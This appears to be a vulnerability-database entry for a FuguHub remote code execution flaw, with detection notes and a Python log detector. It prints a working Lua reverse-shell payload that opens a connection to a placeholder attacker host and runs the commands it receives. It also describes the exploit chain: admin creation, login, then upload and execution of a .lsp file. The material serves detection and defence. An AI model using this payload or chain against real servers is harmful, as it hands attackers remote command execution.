CVE-2023-24078
Published 2023-02-17
CVE-2023-24078: Real Time Logic FuguHub v8.1 and earlier was discovered to contain a remote code execution (RCE) vulnerability via the component /FuguHub/cmsdocs/.
Priority: P2 (74), high
CVSS 3.1: 8.8 (AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)
EXPLOIT
EPSS: 53.24% (98.8th percentile)
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| realtimelogic | fuguhub | <= 8.1 | — |
Detection & IOCs
command:

```lua
local host, port = "{LHOST}", {LPORT}
local socket = require("socket")
local tcp = socket.tcp()
local io = require("io")
tcp:connect(host, port);
while true do
  local cmd, status, partial = tcp:receive()
  local f = io.popen(cmd, "r")
  local s = f:read("*a")
  f:close()
  tcp:send(s)
  if status == "closed" then break end
end
tcp:close()
```
- Monitor for unauthenticated or authenticated POST requests to /Config-Wizard/wizard/SetAdmin.lsp, which the exploit uses to create a rogue admin account if none exists.
- Detect POST requests uploading files with Content-Type application/octet-stream to /fs/cmsdocs/, particularly files with a .lsp extension, which are server-side Lua script pages executed by FuguHub.
- Alert on HTTP GET requests to /rev.lsp (or any newly uploaded .lsp file under /fs/cmsdocs/) immediately following a file upload, indicating webshell execution.
- Look for Lua reverse-shell patterns in uploaded files: use of socket.tcp(), io.popen(), and tcp:receive()/tcp:send() loops, which are characteristic of the exploit payload.
- Monitor for POST requests to /rtl/protected/wfslinks.lsp with form fields ba_username and ba_password, used by the exploit to authenticate before staging the upload.
- The exploit checks whether an admin account already exists via /Config-Wizard/wizard/SetAdmin.lsp; if the page returns 'User database already saved', it skips account creation and proceeds directly to login. Hardened deployments with existing admin accounts are still vulnerable to the upload stage.
- The file server path used for upload defaults to /fs/cmsdocs/ but the exploit notes it searches for a valid file server link, implying the path prefix (e.g., 'fs') may vary per deployment.
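
The request sequence from the detection notes above, correlated per client over web access logs. This is an added example, not a rule from the source page or the vendor; the common-log-format input, the constructed sample lines, the 60-second window and the per-client correlation are all assumptions.

```python
import re
from datetime import datetime, timedelta

# Constructed sample lines (common log format, documentation IP ranges).
SAMPLE_LOG = """\
198.51.100.7 - - [17/Feb/2023:10:00:01 +0000] "POST /Config-Wizard/wizard/SetAdmin.lsp HTTP/1.1" 200 512
198.51.100.7 - - [17/Feb/2023:10:00:03 +0000] "POST /rtl/protected/wfslinks.lsp HTTP/1.1" 200 1024
203.0.113.20 - - [17/Feb/2023:10:00:04 +0000] "GET /index.lsp HTTP/1.1" 200 2048
198.51.100.7 - - [17/Feb/2023:10:00:05 +0000] "POST /fs/cmsdocs/ HTTP/1.1" 200 64
198.51.100.7 - - [17/Feb/2023:10:00:06 +0000] "GET /rev.lsp HTTP/1.1" 200 0
203.0.113.20 - - [17/Feb/2023:10:05:00 +0000] "POST /rtl/protected/wfslinks.lsp HTTP/1.1" 200 1024
"""

LINE = re.compile(r'(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" \d{3} \S+')
STAGES = [  # (stage name, HTTP method, path pattern)
    ("setadmin", "POST", re.compile(r"^/Config-Wizard/wizard/SetAdmin\.lsp$", re.I)),
    ("login", "POST", re.compile(r"^/rtl/protected/wfslinks\.lsp$", re.I)),
    ("upload", "POST", re.compile(r"^/[^/]+/cmsdocs/", re.I)),  # prefix may not be "fs"
]
LSP_GET = re.compile(r"\.lsp$", re.I)
WINDOW = timedelta(seconds=60)  # assumed: how soon "immediately following" is

def parse(text):
    for raw in text.splitlines():
        m = LINE.match(raw)
        if m:
            ip, ts, method, url = m.groups()
            when = datetime.strptime(ts, "%d/%b/%Y:%H:%M:%S %z")
            yield ip, when, method, url.split("?", 1)[0]

def detect(text):
    """Alert on a never-before-requested .lsp page fetched right after an upload."""
    seen_lsp, state, alerts = set(), {}, []
    for ip, when, method, path in parse(text):
        st = state.setdefault(ip, {"stages": [], "upload_at": None})
        for name, meth, pat in STAGES:
            if method == meth and pat.search(path):
                st["stages"].append(name)  # context only; a login alone is not an alert
                if name == "upload":
                    st["upload_at"] = when
                break
        else:
            if method == "GET" and LSP_GET.search(path):
                up = st["upload_at"]
                if path not in seen_lsp and up and when - up <= WINDOW:
                    alerts.append({"client": ip, "path": path, "stages": list(st["stages"])})
                seen_lsp.add(path)
    return alerts
```

The `stages` list on each alert shows which earlier steps (admin creation, login) the same client performed, which helps triage.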
No detection rules found.
No writeups or analysis indexed.
Published: 2023-02-17